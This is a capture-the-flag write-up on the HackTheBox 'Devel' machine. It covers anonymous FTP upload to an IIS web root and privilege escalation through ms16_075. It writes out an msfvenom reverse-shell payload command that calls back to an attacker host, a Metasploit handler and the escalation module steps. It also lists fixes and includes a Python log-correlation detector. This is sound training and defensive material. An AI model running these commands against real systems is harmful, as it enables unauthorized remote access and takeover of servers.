Writeup: Devel CTF

Devel CTF Writeup

This is a writeup presented by Behind Security as part of the Road to OSCP series, focusing on the Devel CTF from HackTheBox.


Devel CTF

Devel, while relatively simple, demonstrates the security risks associated with some default program configurations. It is a beginner-level machine which can be completed using publicly available exploits.


HackTheBox

Hack The Box gives individuals, businesses and universities the tools they need to continuously improve their cybersecurity capabilities — all in one place.

Independent Challenge - 10.10.10.5

export IP=10.10.10.5

Service Enumeration

IP Address    Ports Open
10.10.10.5    TCP: 21, 80
nmap scan output

Initial Access - Writing files to the web server via a misconfigured FTP server

Vulnerability Explanation: Behind Security noticed that the FTP server mirrors the files of the web server on port 80, and that an anonymous user can upload arbitrary files. By uploading a malicious aspx file that was later executed by the IIS HTTP server on port 80, Behind Security was able to establish a foothold on the system.

Vulnerability Fix:

  1. Disable anonymous access to the FTP server to prevent unauthorized file uploads.
  2. Implement proper access controls and permissions on the web server's file directories, ensuring that only authorized users can modify or upload files.
  3. Regularly update and patch both the FTP server and the IIS web server software to the latest versions to address security vulnerabilities.

Severity: High

Steps to Reproduce the Attack:

  1. Generate a malicious aspx file using msfvenom: msfvenom -p windows/meterpreter/reverse_tcp LHOST=ATTACKER-IP LPORT=54321 -f aspx > evil.aspx
  2. Run msfconsole: msfconsole -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST ATTACKER-IP; set LPORT 54321; run"
  3. Log in anonymously to the FTP server on port 21: ftp [email protected]
  4. Upload your malicious aspx file: ftp> put evil.aspx
  5. Make the web server execute the malicious aspx at http://10.10.10.5/evil.aspx
Generating a malicious aspx file
Receiving a meterpreter reverse connection
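Detection note (an added example, not part of the original writeup): the sketch below correlates FTP and HTTP logs to flag a script file stored by an anonymous FTP user and then fetched over HTTP, which is the trace this misconfiguration leaves. The log lines are constructed, the field set is a simplified W3C extended layout, the function names and the extension list are assumptions, and the FTP root is assumed to be the web root, as the writeup describes.

```python
from datetime import datetime

# Extensions treated as server-executed by IIS (assumed list; adjust per site).
SCRIPT_EXT = (".aspx", ".asp", ".ashx", ".asmx")

# Constructed sample logs (W3C extended format, simplified field set).
FTP_LOG = """#Fields: date time c-ip cs-username s-port cs-method cs-uri-stem sc-status
2024-01-01 10:00:00 192.0.2.10 anonymous 21 STOR welcome.png 226
2024-01-01 10:01:00 192.0.2.10 anonymous 21 STOR evil.aspx 226
2024-01-01 10:02:00 192.0.2.20 webadmin 21 STOR default.aspx 226
"""
HTTP_LOG = """#Fields: date time cs-method cs-uri-stem c-ip sc-status
2024-01-01 10:00:30 GET /welcome.png 192.0.2.10 200
2024-01-01 10:01:30 GET /evil.aspx 192.0.2.10 200
2024-01-01 10:03:00 GET /default.aspx 192.0.2.30 200
"""

def parse_w3c(text):
    """Parse W3C extended log text into dicts keyed by the #Fields names."""
    fields, rows = [], []
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            row = dict(zip(fields, line.split()))
            stamp = row["date"] + " " + row["time"]
            row["ts"] = datetime.strptime(stamp, "%Y-%m-%d %H:%M:%S")
            rows.append(row)
    return rows

def find_upload_then_execute(ftp_log, http_log):
    """Return (path, uploader_ip, requester_ip) for script files stored by an
    anonymous FTP user and later fetched with HTTP 200 from the same root."""
    uploads = {}
    for r in parse_w3c(ftp_log):
        path = "/" + r["cs-uri-stem"].lstrip("/").lower()
        if (r["cs-method"].upper() == "STOR" and r["sc-status"] == "226"
                and r["cs-username"].lower() in ("anonymous", "ftp")
                and path.endswith(SCRIPT_EXT)):
            uploads.setdefault(path, r)  # keep the earliest upload
    hits = []
    for r in parse_w3c(http_log):
        up = uploads.get(r["cs-uri-stem"].lower())
        if up and r["sc-status"] == "200" and r["ts"] >= up["ts"]:
            hits.append((r["cs-uri-stem"].lower(), up["c-ip"], r["c-ip"]))
    return hits

if __name__ == "__main__":
    print(find_upload_then_execute(FTP_LOG, HTTP_LOG))
```

Real IIS logs carry more fields than this sample; because the parser keys each row by the `#Fields` header, only the field names used above need to be present.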

Post Exploitation

LPE to Root

Vulnerability Explanation: Further enumeration of the system led to the discovery of a critical vulnerability that allows the user IIS APPPOOL\Web to escalate privileges directly to NT AUTHORITY\SYSTEM. The vulnerability is identified as ms16_075, and a public exploit is available.

Vulnerability Fix: Microsoft has released a fix for this known issue. It is recommended to conduct regular updates on the system.

Severity: Extreme

Steps to Reproduce the Attack:

  1. The attacker needs to have a meterpreter session on the victim machine.
  2. Background the session using the command bg
  3. Use the exploit: use exploit/windows/local/ms16_075_reflection_juicy and set the SESSION variable.
  4. Run the exploit on your meterpreter session and abuse your root privileges.
Elevating privileges to NT AUTHORITY\SYSTEM
Proof of Exploitation: REDACTED user.txt
Proof of Exploitation: REDACTED root.txt
